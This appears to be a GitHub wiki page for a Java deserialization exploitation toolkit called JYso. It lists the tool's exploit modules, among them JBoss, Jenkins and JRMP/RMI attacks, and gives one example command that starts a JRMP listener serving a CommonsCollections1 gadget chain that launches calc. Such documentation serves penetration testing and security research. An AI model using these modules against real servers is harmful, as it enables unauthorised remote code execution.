Skip to content

8、Exploit

炁 edited this page Oct 10, 2024 · 1 revision

除了单独的参数外,其余参数与 payload 的参数保持一致

  • JBoss
  • JenkinsCLI
  • JenkinsListener
  • JenkinsReverse
  • JMXInvokeMBean
  • JRMPClassLoadingListener
  • JRMPClient
  • JRMPListener
  • JSF
  • RMIBindExploit

例如RMI打反序列化链子

java -cp JYso-[version].jar com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections1 -p calc
Clone this wiki locally